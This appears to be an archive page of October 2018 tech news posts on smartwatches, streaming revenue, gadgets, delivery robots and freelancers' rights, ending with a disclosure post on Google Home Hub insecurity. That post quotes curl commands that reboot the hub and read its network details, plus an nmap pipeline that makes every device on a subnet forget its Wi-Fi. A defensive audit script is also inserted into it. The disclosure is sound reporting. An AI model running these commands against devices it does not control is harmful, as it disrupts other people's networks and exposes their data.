Month: October 2018

31 Oct 2018

How the Apple Watch changed the world

In 2015 Switzerland was fucked. This blunt belief, grunted out by Apple’s Jony Ive and repeated by the media as a death knell for the watch industry, seemed to define a sad truth: that the Swiss watch was dead and Apple pulled the trigger.

Now, three years and four Apple Watches later, was Ive right? Did Apple change the world? And, most importantly, did Switzerland survive?

Yes, but…

As you might have noticed the Swiss watch industry is still standing. The major Swiss houses – LVMH, Richemont, and Swatch Group – are seeing a major uptick in sales, especially in the US. According to the Federation of the Swiss Watch Industry, sales are up 5.5% year-over-year, a bit of news that was, amusingly, almost buried by the onslaught of Apple Watch Series 4 reviews.

This increase in US sales bucked a major trend this year, and one market insider, who preferred to remain anonymous, noted that all of his sales contacts are seeing increased sales in the $3,000-and-above watch category. While the low-cost fashion watches were, as he said, “decimated,” the luxury market is growing. But why?

According to Swatch Group, Swiss watch exports rose 4.8 percent compared with last year and, according to a Reuters report, “first-quarter watch exports rose 10.1 percent, the highest quarterly growth rate since mid-2012, according to figures from the Federation of the Swiss Watch Industry.”

“You know we saw an end of the year that was very strong – double-digit growth – and now it continues, so every month is a record month for us,” Swatch Group CEO Nick Hayek told CNBC. In short, the industry is back from an all-time low after the recession.

Watch analysts believe that Apple created a halo effect. Of the millions of people who bought and wore an Apple Watch, a majority had never worn or thought about wearing a watch. Once they tried the Apple Watch, however, and outfitted it with leather bands, fancy Milanese loops, and outfit-matching colors the attitude changed. If wearing watches is so fun and expressive, why not try other, more storied pieces? The numbers are hard to find (watchmakers are notoriously secretive) but I’ve found that my own watch obsessives site, WristWatchReview, saw a solid uptick in traffic in 2015, one that continued, for the most part, into 2018. One year, 2017, was considerably lower because my server was failing almost constantly.

What does this mean for the watch? First, it means that, like vinyl, a new group of obsessives are taking up the collector’s mantle after discovering the implicit value of more modern forms of the same thing. An Apple Watch is a gateway drug to a Tissot which is a gateway drug to a classic tropical Rolex Submariner on a signed band just as your first Radiohead MP3 leads to buying a turntable, an amp, a Grado cartridge, and a pressing of Moon Shaped Pool.

“In high school I wore a Pebble for a while,” said Brady, a 20-year-old college sophomore I spoke to. “As an easily-distracted high school student, even though this wearable was very primitive tech, it consumed a lot of my attention when it wasn’t appropriate to be on my phone – which meant also not appropriate to be on my watch. I then shifted to Nixon quartz ‘fashion watches’ and I was happy knowing they kept good reliable time. Then I got a Seiko SNK805 automatic. I don’t have a single non-mechanical watch due to my respect for the craftsmanship!”

Wearables are changing, as well, pushing regular watches back into the spotlight. As Jon Speer, VP at Greenlight.Guru, notes, most wearables won’t look like watches in the next few years.

“I predict the next generation of wearables to blur the lines between tech accessory and medical device. These ‘devices’ will include capabilities such as measuring blood pressure, blood sugar, body temperature and more,” he said. “The FDA is working closely with industry partners to identify common roadblocks to innovation. The De Novo Program, the classification Apple pursued for the Apple Watch, is the category for medical devices that don’t fall within an existing classification. As we blend medical technology with consumer technology, I foresee the De Novo program being utilized by companies such as Fitbit and Garmin. As a consumer, I’m very excited for the potential and advancements.”

Thus the habit of wearing a watch might stick even as the originator of that habit – a little square of steel and glass strapped to your wrist – disappears.

Could it all be a mirage?

The new Apple Watch is very positively reviewed and Android Wear – as evidenced by companies like Montblanc selling very capable and fashion-forward smartwatches – is still a force to be reckoned with. Further, not everyone falls back into watch wearing after trying out the thing Jony Ive said would fuck Switzerland.

Watches are an acquired taste, like craft beers, artisanal teas, and other Pinterest-ready pursuits. Sometimes simply strapping one to your wrist isn’t enough.

“I got the first gen Apple Watch,” said entrepreneur David Berkowitz. “I loved it, and then I stopped wearing it a bit. As I did, I lost the charger and never bothered replacing it. I haven’t worn it since and haven’t seriously considered getting a new one.”

“I’m just not that customer,” he said.

31 Oct 2018

Consumers spent $329M on the top 10 subscription video apps last quarter

Last year, the top subscription video apps like Netflix and Hulu raked in a combined $781 million, and that trend is showing no sign of slowing down in 2018. In the third quarter of 2018, U.S. consumers spent an estimated $329 million in the top 10 subscription video-on-demand apps across the App Store and Google Play – a figure that’s up 15 percent from the $285 million spent in Q1.

The data is the latest in a new report from app intelligence firm Sensor Tower, which has been following the growth of subscription video apps for some time. Last year, for example, it found that Netflix’s app topped the charts in terms of revenue, when compared with all the other non-game apps on the market.

Netflix hasn’t fallen from its top ranked position, the new data shows. In fact, it’s continuing to grow.

The app pulled in an estimated $132 million in consumer spending across the app stores in Q3, which is up 78 percent from the $74 million spent in the third quarter of 2017.

However, Hulu is now growing faster, the report found. It saw subscription revenue jump 86 percent to $39 million, up from $21 million a year ago.

It seems some consumers may have made the move to Hulu thanks to the extra cash they had on hand, thanks to dropping their HBO subscription.

The only subscription video app that saw revenue decline in Q3 was HBO NOW, which took in $41 million in the quarter, down 40 percent from the $68 million in Q3 2017. But notably absent this quarter was the network’s biggest draw, “Game of Thrones,” which had been airing at this time last year. A drop was expected.

The top grossing chart of these subscription video apps for Q3 2018 looks very similar to last year’s in terms of the apps included, and sometimes, even their rankings.

But two services made moves, the report says.

YouTube TV jumped from $3 million in the year-ago quarter to $16 million in Q3 on Apple’s App Store, thanks to its expanded market penetration and consumer adoption. And ESPN Live Sports, which added in-app subscriptions in Q2, grossed $4.6 million in the third quarter, up 119 percent from Q2.

Even CBS is doing well, despite the fact that not everyone loves the new “Star Trek.”

Still, it appears CBS made a good move by betting on fans’ devotion to the franchise, as U.S. consumers spent $6 million in the app in Q3 2018, up 50 percent from the $4 million spent in Q3 2017.

The report’s data includes subscription revenues only, not refunds or in-app advertising revenues, Sensor Tower notes.

The broad increases in consumer spending on these video apps are yet another example of the significant and growing subscription business – much of which is taking place on mobile. Subscriptions accounted for $10.6 billion in consumer spend on the App Store in 2017, and are poised to grow to $75.7 billion by 2022, an earlier report found.

However, the top subscription apps aren’t all video apps. Others that consistently rank highly in the U.S. include Tinder, Spotify and Pandora, for example. Currently, the top grossing chart for the App Store includes a number of non-games, like Netflix (#1), YouTube (#2), Tinder (#3), Pandora (#4), Hulu (#7), and Bumble (#8).

31 Oct 2018

Daily Crunch: Waymo can go driverless in California

The Daily Crunch is TechCrunch’s roundup of our biggest and most important stories. If you’d like to get this delivered to your inbox every day at around 9am Pacific, you can subscribe here:

1. Waymo, take the wheel: Self-driving cars go fully driverless on California roads

The Alphabet-owned company has been testing on public roads for years now. But this permit, issued by the California Department of Motor Vehicles, allows Waymo to test these self-driving cars without a human driver behind the wheel.

Waymo said its driverless test cars will initially hit the streets near its Silicon Valley headquarters, including parts of Mountain View, Sunnyvale, Los Altos, Los Altos Hills and Palo Alto.

2. Facebook bans the Proud Boys, cutting the group off from its main recruitment platform

We reported in August that the Proud Boys operate a surprisingly sophisticated network for getting new members into the fold via many local and regional Facebook groups.


3. Up close and hands-on with the new iPad Pro

The new Pro, which Apple unveiled yesterday, marks what is arguably the single largest design change to the iPad line in its eight-and-a-half-year existence.

4. Facebook shares climb despite Q3 user growth and revenue

The social network stumbled again in Q3, but shares climbed after its latest earnings report, thanks in part to Facebook’s $5.14 billion profit and the addition of 1 million users in North America.

5. Twitter’s doubling of character count from 140 to 280 had little impact on length of tweets

According to new data released by Twitter, only 1 percent of tweets hit the 280-character limit, and only 12 percent are longer than 140 characters.

6. Apple pulls WatchOS 5.1 update after it bricked some Apple Watches

If you’re an Apple Watch owner having trouble finding the shiny new WatchOS 5.1 update, turns out it isn’t quite ready yet.

7. Starship is using self-driving robots to deliver packages on demand

Once your package arrives at a local Starship facility, the app will notify you. Then you can request a Starship bot that will deliver the package to you, wherever you are.

31 Oct 2018

Nomad releases a stunning wireless charging pad with Apple Watch dock

With Apple’s AirPower still missing in action, the Apple accessory ecosystem has been attempting to fill the need with similar products. Some of these third party products are better than others, and the new Base Station from Nomad looks to be the best of them all.

The Base Station does two things. One, it wirelessly charges up to three mobile devices. Two, it charges an Apple Watch through an integrated Apple MFi-certified magnetic Apple Watch charger. What’s more, it looks great.

A padded leather surface covers three charging coils, allowing the unit to recharge up to three devices — or one device lying horizontally across the pad. Each of the coils is Qi-certified and outputs 7.5W. As for the Apple Watch, it can only be recharged using the included magnetic charger unless Apple activates Qi compatibility through a software update.

The Nomad Base Station is available now for $120. Don’t have an Apple Watch? The same charging base is available for $20 less and still supports up to three devices.

31 Oct 2018

TV streaming services see 212% jump in viewing hours over past year

Live streaming TV services, like Sling TV, PlayStation Vue, Hulu with Live TV, and others, are gaining steam in the U.S. as more consumers cut the cord with traditional pay TV. According to a new report from Conviva out this morning, these services (called virtual MVPDs) now account for over three-quarters of all plays and viewing hours in the U.S. That growth has come at the expense of dedicated apps from individual publishers, the report found.

Over the past 12 months, streaming TV services – the virtual MVPDs like Hulu with live TV, Sling TV, or PlayStation Vue – have seen a 292 percent increase in plays and a 212 percent increase in viewing hours, while publisher apps have seen declines of 16 percent and 19 percent, respectively, across those fronts.

The services have also been improving over time. Many suffered from glitches and outages at launch – and this continues today, on occasion. But overall, they’re more stable than in the past.

The report found that across these streaming TV services, there’s been a 22 percent decrease in video start failures, a 7 percent shorter wait time for video to start playing, 25 percent higher picture quality, and 63 percent less buffering.

The draw of streaming TV services is a cable TV-like experience with added benefits, like the ability to watch across devices, record shows to a cloud DVR that’s not (in theory) limited by disk space on a set-top box, integration with your smartphone’s notification system for alerts about favorite shows or events, and more.

But the ability to tune into live content – like live events and sports – is a major draw for cord cutters, as well.

Year-over-year, live TV content has seen a 49 percent increase in plays and a 54 percent increase in viewing time. The NFL is a huge part of this, with plays up 72 percent and viewing hours up 83 percent in Q3 2018, versus the year-ago quarter.

In the weeks that games were airing, NFL viewership accounted for 3 percent of total plays and 2.8 percent of all viewing hours in the U.S.

Because so many viewers tune in at the same time for a live broadcast, compared with other content, there’s still room for improvement on this front: the firm found that live television streams take 10 percent longer to start, and see 72 percent more exits before the video starts, as a result.

The way consumers are watching streaming TV services is changing, too, the study said.

Though one benefit of these newer services is no longer being tied to a TV for viewing, it seems many still prefer it. While mobile viewing continues to grow – it’s up 57 percent year-over-year – it no longer dominates.

Connected TVs – such as those connected to Roku players, Amazon Fire TV, Apple TV, etc. – now account for as many streaming TV plays (38% on TVs) as mobile devices (39%). They also account for more than twice the viewing hours, with a 56 percent share to mobile’s 25 percent share.

Viewing on the PC is down by 18 percent, meanwhile.

Conviva, like other reports, has found that Roku leads the market – in this case, in terms of viewing hours. Roku accounted for 40 percent of viewing hours, but Amazon Fire TV gained ground. Amazon’s connected TV device platform increased its share of viewing hours from 3 percent to 18 percent over the past 12 months, and increased its share of plays from 4 percent to 19 percent.

The report is a snapshot of the industry that comes from Conviva’s global footprint of 50 billion streams per year across 3 billion applications and 200 million users. The company works with brands like Sling TV, HBO, Sky, Turner, Hulu, Discovery, CBS, Canal Digital, and others. That gives it deep insight into the streaming TV space to see trends, but not a complete look as not all providers are Conviva customers.

31 Oct 2018

This gadget adds two USB 3.0 ports to Apple’s power adapter

This is clever. Made by HyperDrive, the USB-C Hub slips onto an Apple USB-C power adapter and adds two USB 3.0 ports. That’s all. I love it and it addresses a major shortcoming of Apple’s current notebook lineup.

Apple ditched full size USB ports in favor of the versatile USB-C. It makes sense on some levels. USB-C supports nearly every bus format available but there are still a bunch of devices that ship with the older USB plug. Like the iPhone. If a person walks into an Apple store and buys the latest iPhone and the latest MacBook Pro, the iPhone will need a dongle to recharge off the MacBook Pro. Why not make it this dongle?

Similar devices have long been on the market but tend to use the power port to add a USB port. This one uses the power of USB-C, which results in an adapter that’s a touch smaller than the alternatives.

The HyperDrive USB-C Hub comes in two flavors to match the two versions of Apple’s power adapters. The USB-C Hub for the 61W power adapter costs $39.99 while the USB-C Hub for the 87W power adapter costs $49.99. Both are available right now to pre-order at a 25% discount from Hyper.

31 Oct 2018

Starship is using self-driving robots to deliver packages on demand

Soon, the days of package theft will be behind us. For people living in the U.K. town of Milton Keynes, that day is today. That’s thanks to autonomous robot startup Starship Technologies.

Starship’s on-demand package delivery requires you to first install the app, which gives you a delivery address to use in place of your home address, or wherever else you usually get packages delivered. That Starship-provided delivery address is where the company’s local facility is located. Once your package arrives there, the app will notify you and enable you to request a Starship bot to deliver it to you, wherever you are. Through the app, you can also track where your package is at all times.

Starship delivers to homes within a two-mile radius but has plans to expand its service area to make farther deliveries. The company says the battery is not a limitation, but that it merely wants wait time to be as short as possible.

By the end of the year, Starship aims for the service to be available to residents in the San Francisco Bay Area. Pricing has yet to be determined in the U.S., but in the UK, Starship offers the first month for free and then £7.99 per month for an unlimited number of package deliveries.

“The hassle of needing to re-arrange your life for a delivery will become a thing of the past. No more having to switch your working from home day, reschedule meetings, visit a locker, drive to a post office or contact a courier all because of a missed delivery. Starship gets packages to consumers when and where they want them. This is the only service of its kind available in the world today, and it works around your lifestyle.”

A few months ago, Starship raised $25 million from Matrix Partners and Morpheus Ventures. New investors include Airbnb co-founder Nathan Blecharczyk, Skype founding engineer Jaan Tallinn and others. Starship has raised $42.2 million in total.

Starship has previously partnered with on-demand food delivery companies like DoorDash and Postmates to test out its robot delivery service. Last January, Starship partnered with the companies mentioned above for a pilot program in Redwood City, Calif. and Washington, D.C. To date, Starship robots have traveled more than 125,000 miles in 20 countries, across 100 cities.

31 Oct 2018

Freelancers’ rights come of age as gig economy booms

Gig workers, freelancers, sharing economy workers — call them what you want to, but the millions who drive you around in Lyfts, drop off your Seamless delivery or work on piecemeal projects from home have become a staple of the American workforce — and their numbers are only set to grow.

A report out today says 56.7 million Americans worked as freelancers in the last year. That is more than 1 out of 3 of the entire labor force.

For full-time employees, a whole array of protections exists to make sure they get paid, are not discriminated against and retain some income if they lose their jobs. From federal employment laws to state laws and city ordinances, employees have recourse for wrongdoing by employers. But for the fast-growing segment of Americans working as freelancers, little to no legal protections exist.

That’s beginning to change. From a modern take on labor unions in the shape of the Freelancers Union to legal tech startups trying to provide freelancers with simple and accessible contracts that protect their rights, freelancer protections are slowly catching up to the incredible growth that the gig economy has seen over the past few years.

Who is freelancing?

The Freelancers in America Study published today provides a window into who’s doing all the gig jobs around. Jointly commissioned by the Freelancers Union, which has more than 400,000 members nationwide, and Upwork, the largest freelancing website, the study is now in its fifth edition.

It found that freelancers live all across the United States, more than 40% of them are younger than 35 and almost two thirds of them found their work online. At the current rate of growth, we can expect the majority of the US workforce to freelance within less than a decade.

For the most part, the study found that freelancers are content with their work. More than half of those surveyed said that no amount of money would get them to take a traditional job. Compared to non-freelancers, freelancers have a better work/life balance and more control over their schedule, resulting in less stress and better health.

Yet, unlike their traditional full-time counterparts, freelancers disproportionately worry about whether they’re going to get paid for the work they complete, and how they can pursue claims for payment if they don’t. Nearly 70% of freelancers have struggled to collect payment for work they’d completed.

Protecting freelancers

This is where organizations like the Freelancers Union come in. Unlike traditional unions, membership in the Freelancers Union is free — with grants from various donors and fees from offering insurance plans covering the Union’s costs. While membership in traditional private-sector unions peaked in the 1970s and has been in a steady decline since, the Freelancers Union has seen steady growth since it was founded in 1995 and is currently growing at a rate of 1,000 new members a week.

Caitlin Pearce, the union’s Executive Director, tells me that freelancers deal with a fundamental power imbalance. With less than a fourth of them using a contract to protect their rights, they are often left at the mercy of the employer. “Freelancers are basically cut off from all the workplace protections that have become commonplace,” she explained.

In response to the concerns of its members, the Union has been advocating for timely payment by employers, access to affordable health care and more income predictability.

Last year, the Union led a successful advocacy drive to pass the “Freelance Isn’t Free Act” by the New York city council. Under this act, businesses hiring freelancers in New York City are required to use a contract, must pay within 30 days of the work being complete, and freelancers can file a claim with the city to resolve issues they have with businesses. If the claim is successful, then businesses have to pay freelancers double the damages, in addition to the freelancer’s attorney fees.

Serious challenges remain. Even the act itself can’t protect workers who work remotely from as close as New Jersey for businesses based in New York. Effective protections need state and federal level laws, but Pearce says that even within New York State they found little appetite for legislation to protect freelancers’ rights.

For now, the Freelancers Union is doubling down on their municipal strategy, advocating for other cities where many freelancers are based to adopt ordinances similar to the one passed in New York.

Pearce says they’ve started to gain traction in Philadelphia and Madison, and are using the New York campaign as a model. New York showed the Union the widespread support they can galvanize for freelancer rights. From traditional labor unions to WeWork and Kickstarter, a wide range of groups came together to support passing the act. In the end, it passed unanimously, with all 51 New York City council members, including three Republicans, supporting it.

“It’s just a common sense law, if you do work you deserve to be paid,” stresses Pearce. The hope now is that same common sense can prevail in other cities, states and eventually federally.

The startup approach

Protections for freelancers are not only coming from union-like organizations. Some legal tech startups are working to provide more affordable contract services directed specifically at freelancers and small businesses.

Gina Pak and Liam Moriarty met during their time at Columbia Law School, and at first followed the typical attorney route of working for high-powered New York law firms. But a few years into their law careers, they both quit their jobs, packed up their Upper West Side apartment and moved out to Los Angeles to co-found Lawgood.

Pak and Moriarty had found that bad contracts in the US were giving rise to more than 12 million lawsuits every single year, costing the national economy more than $600 billion. Freelancers and small businesses can’t afford attorney fees, and so choose to write their own risky contracts, or go without a contract at all, leading to lawsuits when things inevitably go awry.

Instead, Lawgood provides an online service, where freelancers and businesses can upload any contract they have questions about and get feedback for the fraction of the cost of hiring an attorney.

Then, the company’s system combines a network of carefully vetted lawyers with artificial intelligence technology designed to detect potential problems in the contract. Each user gets a marked-up contract that provides notices of potential issues, simplified explanations of complex wording, and suggestions on how to negotiate.

Pak tells me that as things currently stand, “laws are just inadequate when it comes to protecting freelancers and are not keeping up with the times.” A well-drafted contract can protect both the freelancer and the company that hires them. But in her experience, even the word contract has a bad rep. “It’s a pain point that people just don’t want to go through, and some freelancers are even hesitant to ask for a contract because they don’t want to signal a lack of trust in the person hiring them.”

This means that for Lawgood, apart from enabling freelancers to get affordable, easy to understand contracts, they have to advocate for behavior change. They have to convince freelancers that contracts are one of the most effective communication tools if written well. “Don’t think of it as distrust,” encourages Pak, “but a tool for both sides to succeed and be clear on expectations.”

What does the future hold for supporting freelancers’ rights?

While organizations like the Freelancers Union and startups like Lawgood offer some hope for freelancers, it’s clear that more national level protections are needed to make sure freelancers aren’t taken advantage of.

In that sense, the Freelancers in America Study offers some important clues as to why politicians everywhere should be paying more attention to freelancers. Apart from the fact that they already represent more than 1 out of 3 American workers, the study showed that freelancers are 19 points more politically active than non-freelancers.

Even more strikingly, a whopping 72% of freelancers said they’d be willing to cross party lines to vote for candidates who support freelancers’ rights.

Pearce says one of the best outcomes from publishing the study is quantifying the number of freelancers, a loose and dispersed constituency that had not been properly counted before. The hope now is that their size, level of political engagement and willingness to cross party lines will lead to politicians taking on their cause and eventually passing legislation protecting their rights. Until that happens, freelancers should push for contracts that protect them and join groups like Freelancers Union to amplify their voices.

31 Oct 2018

The Google Home Hub is deeply insecure

Security advocate Jerry Gamblin has posted a set of instructions – essentially basic lines of XML – that can easily pull important information off of the Google Home Hub and, in some cases, temporarily brick the device.

The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as an in-room Google Assistant. This means it connects to Wi-Fi (and allows you to see open Wi-Fi access points near the device), receives video and photos from other devices (and broadcasts its PIN), and accepts commands remotely (including a quick reboot via the command line).

The command – which consists of a simple URL call via the command line – is clearly part of the setup process. You can try this at home if you replace “hub” with the Home Hub’s local IP address.

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

Other one-liners expose further data, including a number of micro services:

$ curl -s http://hub:8008/setup/eureka_info | jq
{
  "bssid": "cc:be:59:8c:11:8b",
  "build_version": "136769",
  "cast_build_revision": "1.35.136769",
  "closed_caption": {},
  "connected": true,
  "ethernet_connected": false,
  "has_update": false,
  "hotspot_bssid": "FA:8F:CA:9C:AA:11",
  "ip_address": "192.168.1.1",
  "locale": "en-US",
  "location": {
    "country_code": "US",
    "latitude": 255,
    "longitude": 255
  },
  "mac_address": "11:A1:1A:11:AA:11",
  "name": "Hub Display",
  "noise_level": -94,
  "opencast_pin_code": "1111",
  "opt_in": {
    "crash": true,
    "opencast": true,
    "stats": true
  },
  "public_key": "Removed",
  "release_track": "stable-channel",
  "setup_state": 60,
  "setup_stats": {
    "historically_succeeded": true,
    "num_check_connectivity": 0,
    "num_connect_wifi": 0,
    "num_connected_wifi_not_saved": 0,
    "num_initial_eureka_info": 0,
    "num_obtain_ip": 0
  },
  "signal_level": -60,
  "ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
  "ssid": "SSID",
  "time_format": 2,
  "timezone": "America/Chicago",
  "tos_accepted": true,
  "uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
  "uptime": 25244.52,
  "version": 9,
  "wpa_configured": true,
  "wpa_id": 0,
  "wpa_state": 10
}

Finally, this line causes all devices on your network to forget their Wi-Fi, forcing you to reenter the setup process.

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub(/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

As Gamblin notes, these holes aren’t showstoppers but they are very alarming. Allowing unauthenticated access to these services is lazy at best and dangerous at worst. He also notes that these endpoints have been open for years on various Google devices, which means this is a regular part of the code base and not considered an exploit by Google.
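As an added defender-side example (not code from the article or from Gamblin’s write-up), the following Python script audits a list of your own inventoried device addresses by issuing only the read-only eureka_info request shown above and reports which of the returned fields a device serves without authentication; the host list, the sensitivity labels and the trimmed sample response are this example’s assumptions.

```python
"""Audit your own Cast/Home Hub devices for the unauthenticated setup API.

Added example, not code from the article or from Gamblin's write-up. It only
issues the read-only GET /setup/eureka_info shown above and reports which
sensitive fields a device serves without authentication; it never touches
the reboot or forget_wifi endpoints.
"""
import json
import urllib.request
from urllib.error import URLError

SETUP_PORT = 8008  # port of the setup endpoints quoted in the article

# Fields from eureka_info that reveal network or pairing details. The labels
# are this example's own assessment (an assumption), not Google's.
SENSITIVE_FIELDS = {
    "ssid": "Wi-Fi network name",
    "bssid": "access-point MAC (geolocatable)",
    "hotspot_bssid": "device hotspot MAC",
    "mac_address": "device MAC address",
    "opencast_pin_code": "casting pairing PIN",
    "public_key": "device public key",
    "uma_client_id": "persistent metrics identifier",
    "ssdp_udn": "persistent device identifier",
    "location": "country / coordinates",
}


def fetch_eureka_info(host, timeout=3.0):
    """GET /setup/eureka_info; returns parsed JSON, or None if unreachable."""
    url = f"http://{host}:{SETUP_PORT}/setup/eureka_info"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return json.load(resp)
    except (URLError, OSError, ValueError):
        return None


def assess_exposure(info):
    """List (field, label) pairs present and non-empty in an eureka_info body.

    Redacted placeholders such as "Removed" still count: the finding is that
    the field is served without authentication, not what it holds today.
    """
    exposed = []
    for field, label in SENSITIVE_FIELDS.items():
        if info.get(field) not in (None, "", {}, []):
            exposed.append((field, label))
    return exposed


def audit_hosts(hosts, fetch=fetch_eureka_info):
    """Probe each inventoried host once; `fetch` is injectable for offline use."""
    report = {}
    for host in hosts:
        info = fetch(host)
        if info is None:
            report[host] = {"reachable": False, "exposed": []}
        else:
            report[host] = {"reachable": True, "name": info.get("name"),
                            "exposed": assess_exposure(info)}
    return report


def format_report(report):
    """Render the audit as plain text, one device per block."""
    lines = []
    for host, result in report.items():
        if not result["reachable"]:
            lines.append(f"{host}: setup API not reachable on port {SETUP_PORT}")
            continue
        lines.append(f"{host} ({result['name']}): unauthenticated setup API "
                     f"exposes {len(result['exposed'])} sensitive field(s)")
        lines.extend(f"  - {field}: {label}" for field, label in result["exposed"])
    return "\n".join(lines)


# Constructed sample: a trimmed copy of the eureka_info response in the article.
SAMPLE_EUREKA_INFO = {
    "bssid": "cc:be:59:8c:11:8b",
    "connected": True,
    "hotspot_bssid": "FA:8F:CA:9C:AA:11",
    "location": {"country_code": "US", "latitude": 255, "longitude": 255},
    "mac_address": "11:A1:1A:11:AA:11",
    "name": "Hub Display",
    "opencast_pin_code": "1111",
    "public_key": "Removed",
    "ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
    "ssid": "SSID",
    "uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
}

if __name__ == "__main__":
    # Offline demonstration against the constructed sample, not a live device.
    demo = audit_hosts(["192.168.1.1"], fetch=lambda host: SAMPLE_EUREKA_INFO)
    print(format_report(demo))
```

Run against the sample, the report lists nine fields served without authentication; pointing `audit_hosts` at real inventory addresses turns it into a periodic check that a firmware update or network segmentation has actually closed the exposure.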

Again, nothing here is mission critical – no Home Hub will ever save my life – but it would be nice to know that devices based on the platform have some modicum of security, even in the form of authentication or obfuscation. Today we can reboot Grandpa’s overcomplicated picture frame with a single line of code but tomorrow we may be able to reboot Grandpa’s oxygen concentrator.
